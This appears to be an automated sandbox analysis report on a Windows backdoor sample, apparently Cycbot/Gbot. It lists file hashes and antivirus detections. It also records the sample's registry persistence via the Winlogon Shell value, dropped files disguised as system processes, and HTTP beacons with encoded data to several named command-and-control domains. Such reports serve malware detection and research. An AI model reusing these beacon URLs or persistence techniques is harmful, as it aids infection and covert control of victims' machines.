Analysis Date: 2015-01-24 05:39:24
MD5: 186cbfaaa6e61ecd83bb7abf7a7cf6d0
SHA1: dd7f368968d4f55c1635418898d9747163d349f6

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: aa9807122b7d733ad1c8da2f124d22d9 sha1: 1e45e09a19f517a51509b53f4f11f8ff9ea4b97c size: 117248
Section: .rdata md5: 755310d995a072bda48f3ed5cc727dd8 sha1: f3e4d3466d7038a53e3ac9a7f9e1e38fd0d472d8 size: 1024
Section: .data md5: 3cb1a6d3d819048dd31e26dbcea87e0c sha1: 92979ac0d578e01b563d762360a56e525289bf5e size: 16896
Section: .rsrc md5: 7d6e385d7ee2d9b207a8e804f3dd0a73 sha1: f2d9d338ea273e6ffc19307e2fc10e2e8c83677e size: 1024
Timestamp: 2005-09-17 11:56:35
Version: PrivateBuild: 1108
PEhash: 37aada94377366a111c11853d2dace98dd2926d0
IMPhash: dd726c5fa4e6a395cdb03557463685da
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV Authentium: W32/Goolbot.C.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Diple-19
AV Dr. Web: Win32.HLLW.SpyBot.343
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.IVA
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.C.gen!Eldorado
AV F-Secure: Trojan-Downloader:W32/Renos.GTC
AV Grisoft (avg): Agent.5.BJ
AV Ikarus: Packed.Win32.Krap
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.bs
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.e
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Rising: no_virus
AV Sophos: Troj/FakeAV-CDG
AV Symantec: Backdoor.Cycbot!gen2
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: dolbyaudiodevice.com
Winsock DNS: zoneck.com
Winsock DNS: www.google.com
Winsock DNS: motherboardstest.com
Winsock DNS: 127.0.0.1
Winsock DNS: zonejm.com
Winsock DNS: pcdocpro.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: pcdocpro.com, Type: A, 209.59.161.20
DNS: zonejm.com, Type: A, 23.239.15.54
DNS: www.google.com, Type: A, 74.125.196.105
DNS: www.google.com, Type: A, 74.125.196.106
DNS: www.google.com, Type: A, 74.125.196.147
DNS: www.google.com, Type: A, 74.125.196.99
DNS: www.google.com, Type: A, 74.125.196.103
DNS: www.google.com, Type: A, 74.125.196.104
DNS: motherboardstest.com, Type: A, 204.11.56.45
DNS: motherboardstest.com, Type: A, 204.11.56.45
DNS: zoneck.com, Type: A, 208.79.234.132
DNS: xibudific.cn, Type: A
DNS: dolbyaudiodevice.com, Type: A
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz2kw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51MortCC5IaGUUmp19LyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GET: http://pcdocpro.com/images/logo-2.jpg?tq=gP4aKyd3DU410DemyURgPalzsHV%2B2fkIxsFM105T2o3IIeQJhBT6hHueRkXoo%2BqOUgUg3yvYvpuya789ZWgzVRkGAj27eSO7DvRoeB2t2%2FnZ0Cqti5AzyfNSCq6geFY3HBGLyIU6USoldbh%2FCU7jAYzrejr%2By%2BPpm%2B5y8uSoQK7%2FeurbDNZrImc4c0Q%2Bhm96qOzEEd4fzPmP9jOqtOhyRwRiFHzHzjoRba8qQ8OGDJx8EiTUG%2BchjeZRgDaCxeYXAIcMqzbGKhmv7TCAYFSfGY%2Bs1QOWi%2FX0hBaRZqpHQ9LPpfiXqLLVDGGcMWXsPvsPGu%2FhmJ%2BwcGqFWs9AF3PrhQ6Iu88s%2BUeQ41TmX4jp2lJ4KjZkwzlIpfiZisH95X2h%2BAeF2ggbmAwROt%2FrznXUhZG2xO%2BIIh8ng1opLn8u0Bp3pw38W5r4TntIiIq0xZ4Nn%2B44d2BJpP7UjWI%2FiSqcHyh29DTq%2Bmx4aCYa021VNRtNFG8deacnEgopKnBS3yxTBoO4YNh5mxIMV
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2kw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2kw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxbNaK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUq3OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUq3OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP: 192.168.1.1:1032 ➝ 23.239.15.54:80
Flows TCP: 192.168.1.1:1033 ➝ 209.59.161.20:80
Flows TCP: 192.168.1.1:1034 ➝ 74.125.196.105:80
Flows TCP: 192.168.1.1:1035 ➝ 74.125.196.105:80
Flows TCP: 192.168.1.1:1036 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1037 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1038 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1039 ➝ 23.239.15.54:80
Flows TCP: 192.168.1.1:1040 ➝ 208.79.234.132:80

Raw Pcap

Strings